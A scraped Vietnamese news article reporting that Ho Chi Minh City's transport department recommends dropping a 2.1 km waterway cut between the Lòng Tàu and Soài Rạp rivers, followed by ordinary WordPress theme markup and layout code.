Thứ Ba, Tháng Mười Một 29, 2022
spot_img

Kiến nghị không đào mới 2,1km nối sông Lòng Tàu và Soài Rạp

Kiến nghị không đào mới 2,1km nối sông Lòng Tàu và Soài Rạp - Ảnh 1.

Luồng sông Soài Rạp được nạo vét, duy tu thường xuyên – Ảnh: B.A.

Về kết nối sông Lòng Tàu và Soài Rạp, Sở Giao thông vận tải TP cho biết dự án khai thông tuyến nối tắt Thị Vải – Đồng bằng Sông Cửu Long (rạch Đào) do Ban Quản lý dự án Đầu tư xây dựng các công trình giao thông TP làm chủ đầu tư đã được TP phê duyệt chủ trương đầu tư năm 2016.

</p> <p>Dự án có quy mô đào tuyến mới với chiều dài 2,1 km với tổng mức đầu tư 25,2 tỉ đồng nhằm nối tắt từ sông Lòng Tàu qua Sông Soài Rạp. </p> <p>Tuy nhiên qua nghiên cứu, khi thực hiện dự án sẽ ảnh hưởng lớn đến đời sống người dân, ảnh hưởng kết cấu hạ tầng giao thông hiện hữu và rừng phòng hộ Cần Giờ.</p> <p>Cụ thể là mất đất do thực hiện đào mới tuyến đưòng thủy nối tắt và mở rộng tuyến đường thủy hiện hữu. Mặt khác,<span style=""> tổng mức đầu tư dự án cũng sẽ vượt nhiều lần so với tổng mức đầu tư theo dự kiến ban đầu, không đảm bảo hiệu quả kinh tế xã hội.</span></p> <p>Từ kết quả nghiên cứu, Ban Quản lý dự án Đầu tư xây dựng các công trình giao thông đã đề xuất dừng, kết thúc không tiếp tục thực hiện dự án này. </p> <p>Cuối năm 2021, Sở Giao thông vận tải TP cũng đề xuất ngưng thực hiện dự án. Hiện Sở Kế hoạch và đầu tư TP đang tổng hợp để báo cáo UBD TP xem xét, quyết định.</p> <p>Theo Sở Giao thông vận tải TP, c<span style="">ác tuyến đường thủy nội đang khai thác kết nối sông Lòng Tàu và sông Soài Rạp gồm: sông Tắc, sông Chà; rạch Lá – Tắc Tây Đen, kênh Bà Tổng – sông Tắc Ông Nghĩa, sông Vàm Sát – Cát Lái, sông Lò Rèn – Dinh Bà-Dần Xây, sông Mũi Nai – Đồng Tranh 2. Các tuyến này hiện đã đáp ứng nhu cầu Iưu thông hàng hóa bằng đường thủy nội địa. </span></p> <p><span style="">Với quy hoạch được duyệt cùng với duy tu, nạo vét thường xuyên, Sở Giao thông vận tải TP cho hay luồng hàng hải Soài Rạp cũng đã </span><span style="">đáp ứng nhu cầu khaí thác trong giai đoạn hiện nay và nhu cầu phát triển trong tương lai của khu cảng Hiệp Phước. </span></p> <p><span style="">Do đó, Sở Giao thông vận tải TP nhận thấy việc kiến nghị nghiên cứu dự án nối tắt sông Lòng Tàu và sông Soài Rạp bằng phương án đào mới và nâng cấp mở rộng tuyến đường thủy hiện hữu để phát triển khu cảng Hiệp Phước là không khả thi.</span></p> </p></div> </div></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_118 td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span> <style scoped> /* inline tdc_css att */ .tdi_118{ margin-top:28px !important; margin-bottom:20px !important; } </style></div><div class="td_block_wrap tdb_single_post_share tdi_119 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_119" ><div id="tdi_119" class="td-post-sharing tdb-block td-ps-border td-ps-border-grey td-ps-padding td-ps-icon-color td-ps-text-color td-post-sharing-style17 "><div class="td-post-sharing-visible"><div class="td-social-sharing-button td-social-sharing-button-js td-social-handler td-social-share-text"> <div class="td-social-but-icon"><i class="td-icon-share"></i></div> <div class="td-social-but-text">Share</div> </div><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Ftuvanbds.net%2F2022%2F04%2F08%2Fkien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=Ki%E1%BA%BFn+ngh%E1%BB%8B+kh%C3%B4ng+%C4%91%C3%A0o+m%E1%BB%9Bi+2%2C1km+n%E1%BB%91i+s%C3%B4ng+L%C3%B2ng+T%C3%A0u+v%C3%A0+So%C3%A0i+R%E1%BA%A1p&url=https%3A%2F%2Ftuvanbds.net%2F2022%2F04%2F08%2Fkien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap%2F&via=Tuvanbds.net" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://tuvanbds.net/2022/04/08/kien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap/&media=https://tuvanbds.net/wp-content/uploads/2022/04/nao-vet-soai-rap-nban-1jpg-1591943883065230598374-1649419476242238316683-crop-16494194911601955438112.jpg&description=Ki%E1%BA%BFn+ngh%E1%BB%8B+kh%C3%B4ng+%C4%91%C3%A0o+m%E1%BB%9Bi+2%2C1km+n%E1%BB%91i+s%C3%B4ng+L%C3%B2ng+T%C3%A0u+v%C3%A0+So%C3%A0i+R%E1%BA%A1p" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=Ki%E1%BA%BFn+ngh%E1%BB%8B+kh%C3%B4ng+%C4%91%C3%A0o+m%E1%BB%9Bi+2%2C1km+n%E1%BB%91i+s%C3%B4ng+L%C3%B2ng+T%C3%A0u+v%C3%A0+So%C3%A0i+R%E1%BA%A1p %0A%0A https://tuvanbds.net/2022/04/08/kien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="tdi_119" title="More"> <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div> </a></div></div></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_121 td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span> <style scoped> /* inline tdc_css att */ .tdi_121{ margin-bottom:30px !important; } </style></div><div class="td_block_wrap tdb_single_next_prev tdi_122 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_122" > <style> /* inline tdc_css att */ .tdi_122{ margin-bottom:43px !important; } </style> <style> /* custom css */ .tdb_single_next_prev{ *zoom: 1; }.tdb_single_next_prev:before, .tdb_single_next_prev:after{ display: table; content: ''; line-height: 0; }.tdb_single_next_prev:after{ clear: both; }.tdb-next-post{ font-family: 'Roboto', sans-serif; width: 48%; float: left; transform: translateZ(0); -webkit-transform: translateZ(0); min-height: 1px; line-height: 1; }.tdb-next-post span{ display: block; font-size: 12px; color: #747474; margin-bottom: 7px; }.tdb-next-post a{ font-size: 15px; color: #222; line-height: 21px; -webkit-transition: color 0.2s ease; transition: color 0.2s ease; }.tdb-next-post a:hover{ color: #4db2ec; }.tdb-post-next{ margin-left: 2%; text-align: right; }.tdb-post-prev{ margin-right: 2%; }.tdi_122 .tdb-next-post a{ color: #000000; font-family:Rubik !important;font-size:15px !important;line-height:1.4 !important;font-weight:500 !important; }.tdi_122 .tdb-next-post:hover a{ color: #dd3333; }.tdi_122 .tdb-next-post span{ font-family:Rubik !important;font-size:11px !important;text-transform:uppercase !important; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ } /* phone */ @media (max-width: 767px){ .tdi_122 .tdb-next-post a{ font-family:Rubik !important;font-size:13px !important;line-height:1.2 !important;font-weight:500 !important; } } </style><div class="tdb-block-inner td-fix-index"><div class="tdb-next-post tdb-next-post-bg tdb-post-prev"><span>Previous article</span><a href="https://tuvanbds.net/2022/04/08/fao-gia-luong-thuc-the-gioi-da-tang-13-con-tang-nua/">FAO: Giá lương thực thế giới đã tăng 13%, còn tăng nữa</a></div><div class="tdb-next-post tdb-next-post-bg tdb-post-next"><span>Next article</span><a href="https://tuvanbds.net/2022/04/08/nhieu-dia-phuong-chuan-bi-he-sinh-thai-don-fdi-xanh/">Nhiều địa phương chuẩn bị hệ sinh thái đón FDI ‘xanh’</a></div></div></div><div class="tdb-author-box td_block_wrap tdb_single_author_box tdi_123 tdb-content-vert-top td-pb-border-top td_block_template_1" data-td-block-uid="tdi_123" > <style> /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .tdi_123{ justify-content:center !important; text-align:center !important; } } </style> <style> /* custom css */ .tdb-author-box .tdb-author-photo, .tdb-author-box .tdb-author-info{ display: table-cell; vertical-align: top; }.tdb-author-box .tdb-author-photo img{ display: block; }.tdb-author-box .tdb-author-counters span{ display: inline-block; background-color: #222; margin: 0 10px 0 0; padding: 5px 10px 4px; font-family: 'Roboto', sans-serif; font-size: 11px; font-weight: 700; line-height: 1; color: #fff; }.tdb-author-box .tdb-author-name, .tdb-author-box .tdb-author-url{ display: block; }.tdb-author-box .tdb-author-name{ margin: 7px 0 8px; font-family: 'Open Sans', 'Open Sans Regular', sans-serif; font-size: 15px; line-height: 21px; font-weight: 700; color: #222; }.tdb-author-box .tdb-author-name:hover{ color: #4db2ec; }.tdb-author-box .tdb-author-url{ margin-bottom: 6px; font-size: 11px; font-style: italic; line-height: 21px; color: #444; }.tdb-author-box .tdb-author-url:hover{ color: #4db2ec; }.tdb-author-box .tdb-author-descr{ font-size: 12px; }.tdb-author-box .tdb-author-social{ margin-top: 4px; }.tdb-author-box .tdb-social-item{ position: relative; display: inline-block; -webkit-transition: all 0.2s; transition: all 0.2s; text-align: center; -webkit-transform: translateZ(0); transform: translateZ(0); }.tdb-author-box .tdb-social-item:last-child{ margin-right: 0 !important; }.tdb-author-box .tdb-social-item i{ color: #000; -webkit-transition: all 0.2s; transition: all 0.2s; }.tdb-author-box .tdb-social-item:hover i{ color: #000; }.tdi_123{ padding: 20px; border: 1px solid #ededed; }.tdi_123 .tdb-author-info{ width: auto; padding-bottom: 0; padding-left: 20px; }.tdi_123 .tdb-author-photo{ width: 120px; transform: translateZ(0); -webkit-transform: translateZ(0); pointer-events: auto; }.tdi_123 .tdb-author-name{ margin: 5px 0 10px 0; font-family:Rubik !important;font-size:15px !important;line-height:1.2 !important;font-weight:500 !important;text-transform:capitalize !important; }.tdi_123 .tdb-social-item i{ font-size: 15px; vertical-align: middle; line-height: 15px; }.tdi_123 .tdb-social-item i.td-icon-twitter, .tdi_123 .tdb-social-item i.td-icon-linkedin, .tdi_123 .tdb-social-item i.td-icon-pinterest, .tdi_123 .tdb-social-item i.td-icon-blogger, .tdi_123 .tdb-social-item i.td-icon-vimeo{ font-size: 12px; }.tdi_123 .tdb-social-item{ min-width: 15px; height: 15px; margin: 10px 20px 10px 0; }.tdi_123 .tdb-author-url{ font-family:Rubik !important;font-size:11px !important;line-height:1 !important;font-weight:400 !important; }.tdi_123 .tdb-author-descr{ font-family:Rubik !important;font-size:13px !important;line-height:1.4 !important;font-weight:400 !important; }.tdi_123 .tdb-author-photo:hover:before{ opacity: 0; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ .tdi_123{ border: 1px solid #ededed; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_123{ padding: 15px; border: 1px solid #ededed; }.tdi_123 .tdb-author-photo{ width: 80px; transform: translateZ(0); -webkit-transform: translateZ(0); }.tdi_123 .tdb-author-info{ padding-bottom: 0; padding-left: 15px; }.tdi_123 .tdb-author-name{ margin: 3px 0 8px 0; font-family:Rubik !important;font-size:13px !important;line-height:1.2 !important;font-weight:500 !important;text-transform:capitalize !important; }.tdi_123 .tdb-author-descr{ font-family:Rubik !important;font-size:11px !important;line-height:1.4 !important;font-weight:400 !important; } } /* phone */ @media (max-width: 767px){ .tdi_123{ border: 1px solid #ededed; }.tdi_123 .tdb-author-photo{ display: inline-block; width: 90px; transform: translateZ(0); -webkit-transform: translateZ(0); }.tdi_123 .tdb-author-info{ display: inline-block; width: 100%; padding-top: 20px; padding-left: 0; } } </style><div class="tdb-block-inner td-fix-index"><a href="https://tuvanbds.net/author/admin/" class="tdb-author-photo" title="admin"><img alt='admin' src='https://secure.gravatar.com/avatar/0e9cc02f7bd41238a68856e903139554?s=500&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/0e9cc02f7bd41238a68856e903139554?s=1000&d=mm&r=g 2x' class='avatar avatar-500 photo' height='500' width='500' loading='lazy' decoding='async'/></a><div class="tdb-author-info"><a href="https://tuvanbds.net/author/admin/" class="tdb-author-name">admin</a><a href="https://tuvanbds.net" class="tdb-author-url">https://tuvanbds.net</a><div class="tdb-author-descr"></div><div class="tdb-author-social"></div></div></div></div><div class="td_block_wrap td_flex_block_4 tdi_124 td_with_ajax_pagination td-pb-border-top td_block_template_8 td_flex_block" data-td-block-uid="tdi_124" > <style> .td_block_template_8.widget > ul > li { margin-left: 0 !important; } .td_block_template_8 .td-block-title { font-size: 20px; font-weight: 800; margin-top: 0; margin-bottom: 18px; line-height: 29px; position: relative; overflow: hidden; text-align: left; } .td_block_template_8 .td-block-title > * { position: relative; padding-right: 20px; color: #000; } .td_block_template_8 .td-block-title > *:before, .td_block_template_8 .td-block-title > *:after { content: ''; display: block; height: 4px; position: absolute; top: 50%; margin-top: -2px; width: 2000px; background-color: #f5f5f5; } .td_block_template_8 .td-block-title > *:before { left: 100%; } .td_block_template_8 .td-block-title > *:after { right: 100%; } @media (max-width: 767px) { .td_block_template_8 .td-related-title a { font-size: 15px; } } .td_block_template_8 .td-related-title a:before { display: none; } .td_block_template_8 .td-related-title a:first-child:after { display: none; } .td_block_template_8 .td-related-title a:last-child:after { left: 100%; right: auto; } .td_block_template_8 .td-related-title .td-cur-simple-item { color: #4db2ec; } .tdi_124 .td-block-title > *:before, .tdi_124 .td-block-title > *:after { background-color: #85c442 !important; } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .tdi_124{ margin-bottom:40px !important; } } </style> <style> /* custom css */ .tdi_124 .td_module_wrap{ padding-left: 2.5px; padding-right: 2.5px; }.tdi_124 .td_block_inner{ margin-left: -2.5px; margin-right: -2.5px; }.tdi_124 .td_module_flex_1{ padding-bottom: 0px; margin-bottom: 0px; }.tdi_124 .td_module_flex_1 .td-module-container:before{ bottom: -0px; border-width: 0 0 1px 0; border-style: none; border-color: #eaeaea; border-color: #eaeaea; }.tdi_124 .td_module_flex_4{ padding-bottom: 13px; margin-bottom: 13px; }.tdi_124 .td_module_flex_4 .td-module-container:before{ bottom: -13px; border-width: 0 0 1px 0; border-style: none; border-color: #eaeaea; border-color: #eaeaea; }.tdi_124 .td_module_wrap:last-child{ margin-bottom: 0 !important; padding-bottom: 0 !important; }.tdi_124 .td_module_wrap:last-child .td-module-container:before{ display: none; }.tdi_124 .td_module_flex_1 .td-module-container{ border-color: #eaeaea; }.tdi_124 .td_module_flex_4 .td-module-container{ border-color: #eaeaea; }.tdi_124 .td_module_flex_1 .entry-thumb{ background-position: center 50%; }.tdi_124 .td_module_flex_4 .entry-thumb{ background-position: center 50%; }.tdi_124 .td_module_flex_4 .td-image-container{ flex: 0 0 30%; width: 30%; display: block; order: 0; }.tdi_124 .td_module_flex_1 .td-image-wrap{ padding-bottom: 120%; }.ie10 .tdi_124 .td_module_flex_1 .td-image-container, .ie11 .tdi_124 .td_module_flex_1 .td-image-container{ flex: 0 0 auto; }.ie10 .tdi_124 .td_module_flex_4 .td-module-meta-info, .ie11 .tdi_124 .td_module_flex_4 .td-module-meta-info{ flex: 1; }.tdi_124 .td_module_flex_4 .td-video-play-ico{ width: 20px; height: 20px; font-size: 20px; }.tdi_124 .td_module_flex_1 .td-video-play-ico{ top: 50%; left: 50%; transform: translate(-50%, -50%); }.tdi_124 .td_module_flex_1 .td-post-vid-time{ display: block; }.tdi_124 .td_module_flex_4 .td-post-vid-time{ display: block; }.tdi_124 .td_module_flex_1 .td-module-meta-info{ position: absolute; bottom: 0; left: 0; width: 100%; text-align: center; padding: 15px 10px; }.tdi_124 .td_module_flex_1 .td-category-pos-image .td-post-category:not(.td-post-extra-category){ top: auto; bottom: 0; left: 50%; transform: translateX(-50%); -webkit-transform: translateX(-50%); }.tdi_124 .td_module_flex_1 .td-image-container{ margin-left: auto; margin-right: auto; }.tdi_124.td-h-effect-up-shadow .td_module_flex_1:hover .td-category-pos-image .td-post-category{ transform: translate(-50%, -2px); -webkit-transform: translate(-50%, -2px); }.tdi_124 .td_module_flex_1 .entry-title{ margin: 10px 0 0 0; font-family:Rubik !important;font-size:15px !important;line-height:1.2 !important;font-weight:500 !important; }.tdi_124 .td_module_flex_1 .td-audio-player{ font-size: 13px; opacity: 1; visibility: visible; height: auto; }.tdi_124 .td_module_flex_4 .td-audio-player{ font-size: 12px; opacity: 1; visibility: visible; height: auto; }.tdi_124 .td_module_flex_1 .td-post-category{ padding: 0px; background-color: rgba(255,255,255,0); color: #ffffff; font-family:Rubik !important;font-size:11px !important;font-weight:500 !important;text-transform:uppercase !important; }.tdi_124 .td_module_flex_1 .td-author-photo .avatar{ width: 20px; height: 20px; margin-right: 6px; border-radius: 50%; }.tdi_124 .td_module_flex_4 .td-author-photo .avatar{ width: 20px; height: 20px; margin-right: 6px; border-radius: 50%; }.tdi_124 .td_module_flex_1 .td-post-category:not(.td-post-extra-category){ display: inline-block; }.tdi_124 .td_module_flex_4 .td-post-category:not(.td-post-extra-category){ display: inline-block; }.tdi_124 .td_module_flex_1 .td-excerpt{ display: none; }.tdi_124 .td_module_flex_4 .td-excerpt{ display: none; }.tdi_124 .td_module_flex_1 .td-author-date{ display: none; }.tdi_124 .td_module_flex_4 .td-author-date{ display: none; }.tdi_124 .td_module_flex_1 .td-post-author-name{ display: none; }.tdi_124 .td_module_flex_4 .td-post-author-name{ display: none; }.tdi_124 .td_module_flex_1 .td-post-date, .tdi_124 .td_module_flex_1 .td-post-author-name span{ display: none; }.tdi_124 .td_module_flex_4 .td-post-date, .tdi_124 .td_module_flex_4 .td-post-author-name span{ display: none; }.tdi_124 .td_module_flex_1 .entry-review-stars{ display: none; }.tdi_124 .td_module_flex_1 .td-icon-star, .tdi_124 .td_module_flex_1 .td-icon-star-empty, .tdi_124 .td_module_flex_1 .td-icon-star-half{ font-size: 15px; }.tdi_124 .td_module_flex_4 .entry-review-stars{ display: none; }.tdi_124 .td_module_flex_4 .td-icon-star, .tdi_124 .td_module_flex_4 .td-icon-star-empty, .tdi_124 .td_module_flex_4 .td-icon-star-half{ font-size: 15px; }.tdi_124 .td_module_flex_1 .td-module-comments{ display: none; }.tdi_124 .td_module_flex_4 .td-module-comments{ display: none; }.tdi_124 .td_module_flex_1 .td-module-thumb a:after{ content: ''; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: -webkit-linear-gradient(0deg,rgba(0,0,0,0.7),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0) 50%,rgba(0,0,0,0));background: linear-gradient(0deg,rgba(0,0,0,0.7),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0) 50%,rgba(0,0,0,0)); }.tdi_124 .td_module_flex_1 .td-module-title a{ color: #ffffff; }.tdi_124 .td_module_flex_1 .td-post-category:hover{ background-color: rgba(255,255,255,0) !important; }.tdi_124.td_with_ajax_pagination .td-next-prev-wrap a:hover, .tdi_124 .td-load-more-wrap a:hover{ background-color: #85c442 !important; border-color: #85c442 !important; border-color: #85c442 !important; }.tdi_124 .td-block-title a, .tdi_124 .td-block-title span{ font-family:Rubik !important;font-size:17px !important;font-weight:500 !important;text-transform:uppercase !important; }html:not([class*='ie']) .tdi_124 .entry-thumb:after{ background: rgba(112,204,63,0.3); }@media (min-width: 767px) { .tdi_124 .td_module_wrap { width: 33.33333333%; float: left; } }@media (min-width: 767px) { .tdi_124 .td_module_wrap:nth-child(3n+1) { clear: both; } }@media (min-width: 767px) { .tdi_124 .td_module_wrap:nth-last-child(-n+3) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .tdi_124 .td_module_wrap:nth-last-child(-n+3) .td-module-container:before { display: none; } }@media (min-width: 1141px) { html:not([class*='ie']) .tdi_124 .entry-thumb:after { content: ''; width: 100%; height: 100%; position: absolute; top: 0; left: 0; opacity: 0; transition: opacity 1s ease; -webkit-transition: opacity 1s ease; mix-blend-mode: color; } html:not([class*='ie']) .tdi_124 .td-module-container:hover .entry-thumb:after { opacity: 1; } } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ .tdi_124 .td_module_wrap{ padding-left: 2px; padding-right: 2px; }.tdi_124 .td_block_inner{ margin-left: -2px; margin-right: -2px; }.tdi_124 .td_module_flex_1 .td-module-meta-info{ padding: 12px 8px; }.tdi_124 .td_module_flex_1 .entry-title{ margin: 8px 0 0 0; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_124 .td_module_wrap{ padding-left: 1.5px; padding-right: 1.5px; }.tdi_124 .td_block_inner{ margin-left: -1.5px; margin-right: -1.5px; }.tdi_124 .td_module_flex_1 .td-module-meta-info{ padding: 10px 5px; }.tdi_124 .td_module_flex_1 .entry-title{ margin: 6px 0 0 0; font-family:Rubik !important;font-size:11px !important;line-height:1.2 !important;font-weight:500 !important; }.tdi_124 .td-block-title a, .tdi_124 .td-block-title span{ font-family:Rubik !important;font-size:15px !important;font-weight:500 !important;text-transform:uppercase !important; } } /* phone */ @media (max-width: 767px){ .tdi_124 .td_module_wrap{ padding-left: 0px; padding-right: 0px; }.tdi_124 .td_block_inner{ margin-left: -0px; margin-right: -0px; }.tdi_124 .td_module_flex_1{ padding-bottom: 1.5px; margin-bottom: 1.5px; }.tdi_124 .td_module_flex_1 .td-module-container:before{ bottom: -1.5px; }.tdi_124 .td_module_flex_1 .td-image-wrap{ padding-bottom: 110%; }.ie10 .tdi_124 .td_module_flex_1 .td-image-container, .ie11 .tdi_124 .td_module_flex_1 .td-image-container{ flex: 0 0 auto; }.tdi_124 .td_module_flex_1 .entry-title{ font-family:Rubik !important;font-size:17px !important;line-height:1.2 !important;font-weight:500 !important; }.tdi_124 .td_module_flex_1 .td-post-category{ font-family:Rubik !important;font-size:13px !important;font-weight:500 !important;text-transform:uppercase !important; } } </style><script>var block_tdi_124 = new tdBlock(); block_tdi_124.id = "tdi_124"; block_tdi_124.atts = '{"image_align":"center","meta_info_align":"bottom","color_overlay":"eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjcpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwLjMpIiwicGVyY2VudGFnZSI6MzV9LHsiY29sb3IiOiJyZ2JhKDAsMCwwLDApIiwicGVyY2VudGFnZSI6NTB9XSwiY3NzIjoiYmFja2dyb3VuZDogLXdlYmtpdC1saW5lYXItZ3JhZGllbnQoMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwLjMpIDM1JSxyZ2JhKDAsMCwwLDApIDUwJSxyZ2JhKDAsMCwwLDApKTtiYWNrZ3JvdW5kOiBsaW5lYXItZ3JhZGllbnQoMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwLjMpIDM1JSxyZ2JhKDAsMCwwLDApIDUwJSxyZ2JhKDAsMCwwLDApKTsiLCJjc3NQYXJhbXMiOiIwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDAuMykgMzUlLHJnYmEoMCwwLDAsMCkgNTAlLHJnYmEoMCwwLDAsMCkifQ==","image_margin":"0","modules_on_row":"33.33333333%","columns":"33.33333333%","meta_info_align1":"image","limit":"3","modules_category":"above","show_author2":"none","show_date2":"none","show_review2":"none","show_com2":"none","show_excerpt2":"none","show_excerpt1":"none","show_com1":"none","show_review1":"none","show_date1":"none","show_author1":"none","meta_info_horiz1":"content-horiz-center","modules_space1":"eyJhbGwiOiIwIiwicGhvbmUiOiIzIn0=","columns_gap":"eyJhbGwiOiI1IiwicG9ydHJhaXQiOiIzIiwibGFuZHNjYXBlIjoiNCIsInBob25lIjoiMCJ9","image_height1":"eyJhbGwiOiIxMjAiLCJwaG9uZSI6IjExMCJ9","meta_padding1":"eyJhbGwiOiIxNXB4IDEwcHgiLCJwb3J0cmFpdCI6IjEwcHggNXB4IiwibGFuZHNjYXBlIjoiMTJweCA4cHgifQ==","art_title1":"eyJhbGwiOiIxMHB4IDAgMCAwIiwicG9ydHJhaXQiOiI2cHggMCAwIDAiLCJsYW5kc2NhcGUiOiI4cHggMCAwIDAifQ==","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","title_txt":"#ffffff","all_underline_color1":"","f_title1_font_family":"712","f_title1_font_line_height":"1.2","f_title1_font_size":"eyJhbGwiOiIxNSIsInBvcnRyYWl0IjoiMTEiLCJwaG9uZSI6IjE3In0=","f_title1_font_weight":"500","f_title1_font_transform":"","f_cat1_font_transform":"uppercase","f_cat1_font_size":"eyJhbGwiOiIxMSIsInBob25lIjoiMTMifQ==","f_cat1_font_weight":"500","f_cat1_font_family":"712","modules_category_padding1":"0","category_id":"","ajax_pagination":"next_prev","f_more_font_family":"","f_more_font_transform":"","f_more_font_weight":"","sort":"","tdc_css":"eyJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwb3J0cmFpdCI6eyJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7Im1hcmdpbi1ib3R0b20iOiI0MCIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9","custom_title":"Related Articles","block_template_id":"td_block_template_8","image_size":"","cat_txt":"#ffffff","border_color":"#85c442","f_header_font_family":"712","f_header_font_size":"eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTUifQ==","f_header_font_transform":"uppercase","f_header_font_weight":"500","mix_type_h":"color","mix_color_h":"rgba(112,204,63,0.3)","pag_h_bg":"#85c442","pag_h_border":"#85c442","block_type":"td_flex_block_4","separator":"","custom_url":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","mc1_el":"","mc4_tl":"","mc4_title_tag":"","mc4_el":"","post_ids":"-1807","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","offset":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","el_class":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","h_effect":"","modules_border_size1":"","modules_border_style1":"","modules_border_color1":"#eaeaea","modules_divider1":"","modules_divider_color1":"#eaeaea","image_alignment1":"50","image_radius1":"","hide_image":"","video_icon1":"","video_icon_pos1":"center","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","meta_width1":"","meta_margin1":"","meta_info_border_radius1":"","modules_category_margin1":"","modules_cat_border1":"","modules_category_radius1":"0","show_cat1":"inline-block","modules_extra_cat1":"","author_photo":"","author_photo_size1":"","author_photo_space1":"","author_photo_radius1":"","review_space1":"","review_size1":"2.5","review_distance1":"","art_excerpt1":"","excerpt_middle":"","show_audio1":"block","hide_audio":"","art_audio1":"","art_audio_size1":"1.5","m_padding2":"","modules_space2":"26","modules_border_size2":"","modules_border_style2":"","modules_border_color2":"#eaeaea","modules_divider2":"","modules_divider_color2":"#eaeaea","image_size3":"","image_alignment2":"50","image_width2":"","image_height2":"","image_floated2":"float_left","image_radius2":"","hide_image3":"","video_icon2":"","video_popup3":"yes","video_rec3":"","video_rec_title3":"","video_rec_color3":"","autoplay_vid3":"yes","show_vid_t3":"block","vid_t_margin3":"","vid_t_padding3":"","meta_info_horiz2":"content-horiz-left","meta_width2":"","meta_margin2":"","meta_padding2":"","meta_info_border_radius2":"","art_title2":"","modules_category3":"","modules_category_margin2":"","modules_category_padding2":"","modules_cat_border2":"","modules_category_radius2":"0","show_cat2":"inline-block","modules_extra_cat2":"","author_photo3":"","author_photo_size2":"","author_photo_space2":"","author_photo_radius2":"","review_space2":"","review_size2":"2.5","review_distance2":"","art_excerpt2":"","excerpt_middle3":"","show_audio2":"block","hide_audio3":"","art_audio2":"","art_audio_size2":"1","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax 